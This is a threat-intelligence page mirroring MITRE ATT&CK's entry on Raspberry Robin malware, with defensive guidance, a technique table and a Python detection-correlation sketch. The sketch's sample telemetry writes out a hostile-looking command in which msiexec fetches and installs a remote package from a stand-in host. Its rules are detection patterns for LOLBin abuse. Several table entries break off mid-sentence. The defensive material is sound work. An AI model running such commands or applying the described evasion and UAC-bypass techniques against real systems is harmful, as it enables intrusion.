S1130: Raspberry Robin
Raspberry Robin is initial access malware first identified in September 2021, and active through early 2024. The malware is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remote hosted payloads for installation. Raspberry Robin has been widely used against various industries and geographies, and as a precursor to information stealer, ransomware, and other payloads such as SocGholish, Cobalt Strike, IcedID, and Bumblebee.[1][2][3] The DLL component in the Raspberry Robin infection chain is also referred to as "Roshtyak."[4] The name "Raspberry Robin" is used to refer to both the malware as well as the threat actor associated with its use, although the Raspberry Robin operators are also tracked as Storm-0856 by some vendors.[5]
Analyst context for executives and security teams
Raspberry Robin matters because it turns ordinary Windows endpoint use and removable media handling into an initial-access and follow-on payload risk. The ATT&CK entry describes malware that spreads through infected USB devices with malicious LNK objects and retrieves remote payloads, with documented use as a precursor to information stealers, ransomware-enabling tooling, and other malware families. For leaders, the decision point is whether endpoint, USB, script, command-line, and web egress controls can interrupt the chain early enough to avoid a larger incident.
Executive priority
Prioritize Raspberry Robin as an operational resilience and incident-readiness scenario for Windows environments, especially where removable media is permitted or difficult to eliminate. It is useful for testing whether policy, endpoint logging, network egress monitoring, and response playbooks can connect a user-executed USB/LNK event to later behaviors such as command execution, WMI use, LOLBin proxy execution, payload download, discovery, masquerading, cleanup, and web-based command-and-control. Because MITRE provides no official detection text for this object, executives should ask for evidence of telemetry coverage and practiced response decisions rather than assurance based only on signatures.
Technical view
Validate coverage around the behaviors linked to Raspberry Robin: removable media replication and user execution, Windows command shell and WMI execution, abuse of signed Windows utilities such as msiexec.exe, odbcconf.exe, and regsvr32.exe, obfuscation and packing, process hollowing, discovery commands, file deletion or persistence cleanup, web protocol C2, web services, and ingress tool transfer. Detection engineering should correlate USB insertion or LNK execution with unusual child processes, remote payload retrieval, DLL execution paths, suspicious LOLBin parameters, and short-lived artifacts that may be deleted. IR teams should preserve removable media evidence, endpoint process trees, file system artifacts, and network destinations before cleanup reduces forensic value.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- Removable media insertion and file execution events
- LNK file creation, modification, and execution evidence
- DLL load and module execution telemetry
- WMI activity logs and endpoint management events
Detection direction
- Build correlations from removable media or LNK execution to script/command execution and outbound web traffic rather than relying on a single indicator.
- Tune LOLBin detections for context: signed Windows utilities are common, so prioritize unusual parent-child relationships, remote content access, DLL execution, and execution from removable or user-writable paths.
- Monitor for discovery activity after initial execution, including user, process, system, and file/directory enumeration, as this may indicate staging for follow-on payloads.
- Account for evasion: packing, obfuscation, masqueraded file types, masqueraded services/tasks, process hollowing, and file deletion can reduce the value of static signatures and post-event file collection.
- Review visibility gaps where web protocols and legitimate web services are broadly allowed, because this can obscure command-and-control or payload transfer in normal traffic.
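As an added example (not part of the ATT&CK object, the Glexia analysis, or any vendor's detection content), the following Python sketch implements the correlation described in the technical view and detection direction above: it scores constructed Sysmon-style process-creation and network-connection records against the behaviors listed in the technique rows (cmd.exe reading from a removable drive under explorer.exe, regsvr32/rundll32 with no parameters, msiexec/odbcconf/wmic referencing a remote URL, fodhelper.exe children, LOLBin HTTP on port 8080) and alerts only when several distinct rules fire on one host inside a window. The field names, rule weights, the 10-minute window, the alert threshold, and the assumption that drive letters D: and above are removable are all assumptions made for this example; the sample events are constructed and use reserved example addresses.

```python
"""Correlate Raspberry Robin-style endpoint telemetry (added example, constructed data)."""
import re
from datetime import datetime, timedelta

# Rule tables are assumptions derived from the technique rows on this page, not vendor signatures.
LOLBINS_NO_ARGS = {"regsvr32.exe", "rundll32.exe"}             # T1218.010 / T1218.011: run with no parameters
LOLBINS_REMOTE = {"msiexec.exe", "odbcconf.exe", "wmic.exe"}  # T1218.007 / T1218.008 / T1047: remote payload fetch
REMOVABLE_PATH = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)     # assumption: D: and above are removable on these hosts
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
WINDOW = timedelta(minutes=10)                                # assumption: chain must complete within 10 minutes
ALERT_THRESHOLD = 5                                           # assumption: minimum combined weight to alert


def base_name(path: str) -> str:
    """Lower-cased file name from a Windows path (handles forward slashes too)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the executable token, whether that token is quoted or bare."""
    m = re.match(r'\s*("[^"]*"|\S+)(.*)$', cmdline)
    return bool(m and m.group(2).strip())


def score_event(e: dict) -> list:
    """Return (rule, weight) hits for one telemetry record; an event may hit several rules."""
    hits = []
    if e["kind"] == "process":
        img = base_name(e["image"])
        parent = base_name(e.get("parent", ""))
        cmd = e.get("cmdline", "")
        if img == "cmd.exe" and parent == "explorer.exe" and REMOVABLE_PATH.search(cmd):
            hits.append(("cmd_from_removable", 3))      # T1091 + T1204 + T1059.003
        if img in LOLBINS_NO_ARGS and not has_arguments(cmd):
            hits.append(("lolbin_no_args", 2))          # parameterless regsvr32/rundll32 C2 pattern
        if img in LOLBINS_REMOTE and REMOTE_URL.search(cmd):
            hits.append(("lolbin_remote_payload", 3))   # T1105 via msiexec/odbcconf/wmic
        if parent == "fodhelper.exe":
            hits.append(("fodhelper_child", 3))         # T1548.002
    elif e["kind"] == "network":
        img = base_name(e["image"])
        if e.get("dst_port") == 8080 and img in (LOLBINS_NO_ARGS | LOLBINS_REMOTE):
            hits.append(("lolbin_http_8080", 2))        # T1571 / T1071.001
    return hits


def correlate(events: list) -> list:
    """Per host, collect hits within WINDOW of the first hit; alert on total weight and rule diversity."""
    by_host = {}
    for e in sorted(events, key=lambda x: x["ts"]):
        by_host.setdefault(e["host"], []).append(e)
    alerts = []
    for host, evs in by_host.items():
        chain = [(e["ts"], rule, w) for e in evs for rule, w in score_event(e)]
        if not chain:
            continue
        start = chain[0][0]
        in_window = [h for h in chain if h[0] - start <= WINDOW]
        rules = sorted({h[1] for h in in_window})
        score = sum(h[2] for h in in_window)
        # Require at least two distinct behaviors so a lone LOLBin execution does not page anyone.
        if score >= ALERT_THRESHOLD and len(rules) >= 2:
            alerts.append({"host": host, "score": score, "rules": rules, "first_seen": start.isoformat()})
    return alerts


# ---- constructed sample telemetry (not real logs) ----
T0 = datetime(2024, 1, 15, 10, 0, 0)


def _ev(offset_s: int, host: str, kind: str, **fields) -> dict:
    return {"ts": T0 + timedelta(seconds=offset_s), "host": host, "kind": kind, **fields}


SAMPLE_EVENTS = [
    # WS01: explorer-launched cmd reads a file on E:, msiexec fetches a remote package over 8080,
    # then regsvr32 runs with no parameters (mixed-case names mirror the obfuscation row above).
    _ev(0, "WS01", "process", image=r"C:\Windows\System32\cmd.exe", parent=r"C:\Windows\explorer.exe",
        cmdline=r"CmD.ExE /c TyPe E:\Work\notes.dat | CmD.ExE"),
    _ev(5, "WS01", "process", image=r"C:\Windows\System32\msiexec.exe", parent=r"C:\Windows\System32\cmd.exe",
        cmdline=r"MsIeXeC /q /i http://example.invalid:8080/pkg"),
    _ev(8, "WS01", "network", image=r"C:\Windows\System32\msiexec.exe", dst_ip="203.0.113.10", dst_port=8080),
    _ev(60, "WS01", "process", image=r"C:\Windows\System32\regsvr32.exe", parent=r"C:\Windows\System32\msiexec.exe",
        cmdline=r'"C:\Windows\System32\regsvr32.exe"'),
    # WS02: routine activity using the same signed binaries; should stay quiet.
    _ev(0, "WS02", "process", image=r"C:\Windows\System32\cmd.exe", parent=r"C:\Windows\explorer.exe",
        cmdline=r"cmd.exe /c dir C:\Users\jdoe"),
    _ev(30, "WS02", "process", image=r"C:\Windows\System32\regsvr32.exe", parent=r"C:\Windows\System32\msiexec.exe",
        cmdline=r'regsvr32.exe /s "C:\Program Files\Vendor\app.dll"'),
    _ev(40, "WS02", "process", image=r"C:\Windows\System32\msiexec.exe", parent=r"C:\Windows\explorer.exe",
        cmdline=r"msiexec.exe /i C:\Users\jdoe\Downloads\tool.msi"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Running the block reports one alert for WS01 with four distinct rules and no alert for WS02, which is the point of the weighting: each individual behavior (a cmd.exe child, a parameterless regsvr32, an msiexec install) is common on its own, and only the combination within a short window on one host justifies paging. In a real pipeline the drive-letter test should be replaced by the actual removable-media insertion events listed under likely telemetry, and the window should slide rather than anchor on the first hit.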
Mitigation priorities
- Reduce removable media risk first: restrict or control USB execution where business permits and ensure exceptions are documented and monitored.
- Harden Windows execution paths by limiting unnecessary script, command shell, WMI, and signed utility abuse through policy and application control where feasible.
- Improve egress control and monitoring for endpoints so remote payload retrieval and web-service-based communications are not treated as unmanaged background noise.
- Ensure endpoint protection and logging preserve process lineage, command lines, file events, and network context long enough for investigation.
- Prepare IR playbooks for USB/LNK-originated infection chains, including evidence collection from the host, removable device, and network logs before artifact cleanup occurs.
Analyst notes and limits
The supplied ATT&CK object identifies Raspberry Robin as Windows initial-access malware active through early 2024 and notable for infected USB devices containing malicious LNK objects that retrieve remote hosted payloads. Relationship context expands the defensive focus to execution, stealth, discovery, command-and-control, ingress transfer, and removable media replication techniques. The object also notes that Raspberry Robin has been used as a precursor to other payloads, which makes early containment and evidence preservation more important than malware-family naming alone.
MITRE does not provide an official detection section for this object, and the supplied tactics field is not specified for the malware object itself. This take therefore uses the official description, external references list, platform field, and stated technique relationships only. Local conclusions about exposure, active intrusion, control effectiveness, or detection coverage require environment-specific telemetry and validation.
Raspberry Robin
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1518.001 | Security Software Discovery | Raspberry Robin attempts to identify security software running on the victim machine, such as BitDefender, Avast, and Kaspersky.[1][3] |
| Enterprise | T1685 | Disable or Modify Tools | Raspberry Robin can add an exception to Microsoft Defender that excludes the entire main drive from anti-malware scanning to evade detection.[3] |
| Enterprise | T1082 | System Information Discovery | Raspberry Robin performs several system checks as part of anti-analysis mechanisms, including querying the operating system build number, processor vendor and type, video controller, and CPU temperature.[3] |
| Enterprise | T1027.002 | Software Packing | Raspberry Robin contains multiple payloads that are packed for defense evasion purposes and unpacked on runtime.[1] |
| Enterprise | T1102 | Web Service | Raspberry Robin second stage payloads can be hosted as RAR files, containing a malicious EXE and DLL, on Discord servers.[3] |
| Enterprise | T1480 | Execution Guardrails | Raspberry Robin will check for the presence of several security products on victim machines and will avoid UAC bypass mechanisms if they are identified.[1] Raspberry Robin can use specific cookie values in HTTP requests to command and control infrastructure to validate that requests for second stage payloads originate from the initial downloader script.[3] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | Raspberry Robin will use a Registry key to achieve persistence through reboot, setting a RunOnce key such as: |
| Enterprise | T1559 | Inter-Process Communication | Raspberry Robin contains an embedded custom Tor network client that communicates with the primary payload via shared process memory.[1] |
| Enterprise | T1571 | Non-Standard Port | Raspberry Robin will communicate via HTTP over port 8080 for command and control traffic.[2] |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment.[1] |
| Enterprise | T1036.004 | Masquerade Task or Service | Raspberry Robin will execute its payload prior to initializing command and control traffic by impersonating one of several legitimate program names such as dllhost.exe, regsvr32.exe, or rundll32.exe.[1] |
| Enterprise | T1218.010 | Regsvr32 | Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.[2] |
| Enterprise | T1033 | System Owner/User Discovery | Raspberry Robin determines whether it is successfully running on a victim system by querying the running account information to determine if it is running in Session 0, indicating running with elevated privileges.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's |
| Enterprise | T1574 | Hijack Execution Flow | Raspberry Robin will drop a copy of itself to a subfolder in |
| Enterprise | T1036.008 | Masquerade File Type | Raspberry Robin has historically been delivered via infected USB drives containing a malicious LNK object masquerading as a legitimate folder.[2] |
| Enterprise | T1091 | Replication Through Removable Media | Raspberry Robin has historically used infected USB media to spread to new victims.[1][2] |
| Enterprise | T1071.001 | Web Protocols | Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.[2] Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.[3] |
| Enterprise | T1055.012 | Process Hollowing | Raspberry Robin will execute a legitimate process, then suspend it to inject code for a Tor client into the process, followed by resumption of the process to enable Tor client execution.[1] |
| Enterprise | T1583.001 | Domains | Raspberry Robin uses newly-registered domains containing only a few characters for command and control purposes, such as " |
| Enterprise | T1574.001 | DLL | Raspberry Robin can use legitimate, signed EXE files paired with malicious DLL files to load and run malicious payloads while bypassing defenses.[3] |
| Enterprise | T1057 | Process Discovery | Raspberry Robin can identify processes running on the victim machine, such as security software, during execution.[1][3] |
| Enterprise | T1047 | Windows Management Instrumentation | Raspberry Robin can execute via LNK containing a command to run a legitimate executable, such as wmic.exe, to download a malicious Windows Installer (MSI) package.[1] |
| Enterprise | T1559.001 | Component Object Model | Raspberry Robin creates an elevated COM object for |
| Enterprise | T1083 | File and Directory Discovery | Raspberry Robin will check to see if the initial executing script is located on the user's Desktop as an anti-analysis check.[3] |
| Enterprise | T1059.003 | Windows Command Shell | Raspberry Robin uses cmd.exe to read and execute a file stored on an infected USB device as part of initial installation.[2] |
| Enterprise | T1218.008 | Odbcconf | Raspberry Robin uses the Windows utility odbcconf.exe to execute malicious commands, using the |
| Enterprise | T1218.011 | Rundll32 | Raspberry Robin uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with Tor nodes.[2] |
| Enterprise | T1548 | Abuse Elevation Control Mechanism | Raspberry Robin implements a variation of the |
| Enterprise | T1204 | User Execution | Raspberry Robin execution can rely on users directly interacting with malicious LNK files.[5] |
| Enterprise | T1622 | Debugger Evasion | Raspberry Robin leverages anti-debugging mechanisms through the use of |
| Enterprise | T1583.008 | Malvertising | Raspberry Robin variants have been delivered via malicious advertising items that, when interacted with, download a malicious archive file containing the initial payload, hosted on services such as Discord.[3] |
| Enterprise | T1070.004 | File Deletion | Raspberry Robin can delete its initial delivery script from disk during execution.[3] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Raspberry Robin contains several layers of obfuscation to hide malicious code from detection and analysis.[1] |
| Enterprise | T1497.001 | System Checks | Raspberry Robin performs a variety of system environment checks to determine if it is running in a virtualized or sandboxed environment, such as querying CPU temperature information and network card MAC address information.[3] |
| Enterprise | T1070.009 | Clear Persistence | Raspberry Robin uses a |
| Enterprise | T1071 | Application Layer Protocol | Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads.[2][1][3] |
| Enterprise | T1548.002 | Bypass User Account Control | Raspberry Robin will use the legitimate Windows utility fodhelper.exe to run processes at elevated privileges without requiring a User Account Control prompt.[2] |
| Enterprise | T1027 | Obfuscated Files or Information | Raspberry Robin uses mixed-case letters for filenames and commands to evade detection.[2] |
| Enterprise | T1218.007 | Msiexec | Raspberry Robin uses msiexec.exe for post-installation communication to command and control infrastructure.[2] Msiexec.exe is executed referencing a remote resource for second-stage payload retrieval and execution.[1] |
| Enterprise | T1059 | Command and Scripting Interpreter | Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files (WSF) for initial execution.[3] |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | e206131517da… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] TrendMicro RaspberryRobin 2022: Christopher So. (2022, December 20). Raspberry Robin Malware Targets Telecom, Governments. Retrieved May 17, 2024.
- [2] RedCanary RaspberryRobin 2022: Lauren Podber and Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 17, 2024.
- [3] HP RaspberryRobin 2024: Patrick Schläpfer. (2024, April 10). Raspberry Robin Now Spreading Through Windows Script Files. Retrieved May 17, 2024.
- [4] Avast RaspberryRobin 2022: Jan Vojtěšek. (2022, September 22). Raspberry Robin's Roshtyak: A Little Lesson in Trickery. Retrieved May 17, 2024.
- [5] Microsoft RaspberryRobin 2022: Microsoft Threat Intelligence. (2022, October 27). Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity. Retrieved May 17, 2024.
- [6] mitre-attack S1130: MITRE ATT&CK source object for S1130.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.